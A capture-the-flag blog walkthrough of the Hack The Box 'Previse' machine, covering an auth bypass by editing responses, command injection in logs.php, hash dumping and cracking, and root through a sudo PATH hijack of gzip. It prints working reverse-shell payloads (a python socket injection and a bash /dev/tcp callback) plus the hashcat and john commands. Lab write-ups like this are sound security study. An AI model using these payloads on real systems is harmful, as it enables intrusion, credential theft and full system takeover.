Hack-The-Box-walkthrough[previse]

Posted on Edited on In Views: Word count in article: 1.2k Reading time ≈ 4 mins.

introduce

OS: Linux
Difficulty: Easy
Points: 20
Release: 07 Aug 2021
IP: 10.10.11.104

  • my htb rank

Enumeration

Nmap

1
2
3
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

ffuf

1
2
3
4
5
6
7
8
9
10
11
12
13
index.php [Status: 302, Size: 2801, Words: 737, Lines: 72]
login.php [Status: 200, Size: 2224, Words: 486, Lines: 54]
config.php [Status: 200, Size: 0, Words: 1, Lines: 1]
download.php [Status: 302, Size: 0, Words: 1, Lines: 1]
footer.php [Status: 200, Size: 217, Words: 10, Lines: 6]
header.php [Status: 200, Size: 980, Words: 183, Lines: 21]
favicon.ico [Status: 200, Size: 15406, Words: 15, Lines: 10]
logout.php [Status: 302, Size: 0, Words: 1, Lines: 1]
. [Status: 302, Size: 2801, Words: 737, Lines: 72]
status.php [Status: 302, Size: 2966, Words: 749, Lines: 75]
nav.php [Status: 200, Size: 1248, Words: 462, Lines: 32]
accounts.php [Status: 302, Size: 3994, Words: 1096, Lines: 94]
files.php [Status: 302, Size: 4914, Words: 1531, Lines: 113]

curl

1
curl http://10.10.11.104/files.php

So it seems we can access parts of the site with a fwe tricks. Testing further showed I can capture the request from nav.php and then change the response from a 302 to 200 to access the account page.

Clicking on Do Intercept > Response to this request.

Change the 302 to 200

Create a new user and use the same tatics for capturing the request and editing the response.

Then login with the new account.

Files

  • config.php
1
2
3
4
$host = 'localhost';
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
  • logs.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(root💀kali)-[~/hackthebox/machine/previse/siteBackup]
└─# ls
accounts.php  download.php   files.php   header.php  login.php   logs.php  status.php
config.php    file_logs.php  footer.php  index.php   logout.php  nav.php
┌──(root💀kali)-[~/hackthebox/machine/previse/siteBackup]
└─# cat logs.php
<?php
session_start();
if (!isset($_SESSION['user'])) {
    header('Location: login.php');
    exit;
}
?>

<?php
if (!$_SERVER['REQUEST_METHOD'] == 'POST') {
    header('Location: login.php');
    exit;
}

/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////

$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

$filepath = "/var/www/out.log";
$filename = "out.log";    

if(file_exists($filepath)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($filepath));
    ob_clean(); // Discard data in the output buffer
    flush(); // Flush system headers
    readfile($filepath);
    die();
} else {
    http_response_code(404);
    die();
} 
?>

In logs.php we can see the developer had to use python instead of PHP for the delimiters for ease of use and this also looks vunerable to command injection.

User

Reverse shell.

To get a reverse shell. Login as your new user, goto the Management menu > logs. Capture the request in burp and add a python reverse shell to the delim attribute.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/file_logs.php
Cookie: PHPSESSID=1ef4dj4rj6qthba48f58r5d3va
Upgrade-Insecure-Requests: 1



delim=comma;python3+-c+'import+os,pty,socket%3bs%3dsocket.socket()%3bs.connect(("10.10.14.31",9999))%3b[os.dup2(s.fileno(),f)for+f+in(0,1,2)]%3bpty.spawn("/bin/bash")'

Have your netcat listner ready!

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root💀kali)-[~]
└─# rlwrap -cAr nc -lnvp 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.10.11.104.
Ncat: Connection from 10.10.11.104:58472.
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
whoami
www-data

mysql

Let’s get any info and hash’s from the database.

1
2
3
4
5
6
7
8
mysql -u root -p
pass:mySQL_p@ssw0rd!:)

show databases;
use previse;
show tables;

select * from accounts;
1
2
3
4
5
6
7
8
9
10
select * from accounts;
+----+----------+------------------------------------+---------------------+
| id | username | password                           | created_at          |
+----+----------+------------------------------------+---------------------+
|  1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
|  2 | omwsec   | $1$🧂llol$SvtRsZqR3Wg4M1IAk.glQ. | 2021-08-08 07:09:48 |
|  3 | hello    | $1$🧂llol$6gzMmYsDY2EBz35vH5gST. | 2021-08-08 07:10:42 |
|  4 | admin1   | $1$🧂llol$UQb0RhzDERebjcLHQXEim. | 2021-08-08 14:12:25 |
+----+----------+------------------------------------+---------------------+
4 rows in set (0.00 sec)

Cracking the hash

  • hashcat
1
hashcat64.exe -a 0 -m 500 password.txt rockyou.txt

now got the passwords…

1
2
3
4
D:\hashcat-5.1.0\hashcat-5.1.0>hashcat64.exe -a 0 -m 500 password.txt rockyou.txt --show
$1$馃llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!
$1$馃llol$UQb0RhzDERebjcLHQXEim.:admin1
$1$馃llol$6gzMmYsDY2EBz35vH5gST.:hello
  • john
1
john -format=md5crypt-long --wordlist==/usr/share/wordlists/rockyou.txt hash.txt
1
m4lwhere:ilovecody112235!

Time to SSH into the box for a better shell.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root💀kali)-[~/hackthebox/machine/previse]
└─# ssh m4lwhere@10.10.11.104
m4lwhere@10.10.11.104's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Aug  8 14:40:53 UTC 2021

  System load:  0.0               Processes:           174
  Usage of /:   49.3% of 4.85GB   Users logged in:     0
  Memory usage: 29%               IP address for eth0: 10.10.11.104
  Swap usage:   0%


0 updates can be applied immediately.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Aug  8 12:54:42 2021 from 10.10.14.31
m4lwhere@previse:~$ id
uid=1000(m4lwhere) gid=1000(m4lwhere) groups=1000(m4lwhere)
m4lwhere@previse:~$ \whoami
m4lwhere
m4lwhere@previse:~$ cat user.txt 
a8d88d4c17d4b65e6875b1f9ef2aee31

Root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere: 
User m4lwhere may run the following commands on previse:
    (root) /opt/scripts/access_backup.sh
m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz

Let’s try some path abuse for gzip.

nano gzip

1
2
3
#!/bin/bash

bash -i >& /dev/tcp/10.10.14.31/2234 0>&1
1
2
3
4
5
m4lwhere@previse:/tmp$ chmod +x gzip
m4lwhere@previse:/tmp$ export PATH=$(pwd):$PATH
m4lwhere@previse:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh

and we get a rev shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root💀kali)-[~/hackthebox/machine/previse]
└─# nc -lvp 2234                                                                                                                  
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2234
Ncat: Listening on 0.0.0.0:2234
Ncat: Connection from 10.10.11.104.
Ncat: Connection from 10.10.11.104:37304.
root@previse:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
root@previse:/tmp# whoami
whoami
root
root@previse:/tmp# cd /root
cd /root
root@previse:/root# cat root.txt
cat root.txt
5b0c3562a1e4ab347a5445ec95ffaedf
root@previse:/root# cat /etc/shadow | grep root
cat /etc/shadow | grep root
root:$6$QJgW9tG2$yIhp0MQm9b4ok8j9su9H0hJ.GuwI5AHusMrZBQv2oLfvotY5YR0MJ82zJ4xi5WCKQSWn/a3HO/M/TjS/YC0Mk1:18824:0:99999:7:::

Summary of knowledge

  • create user by change responese code status
  • get Reverse shell by php command injection
  • Cracking the hash with hashcat
  • privesc with gzip

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…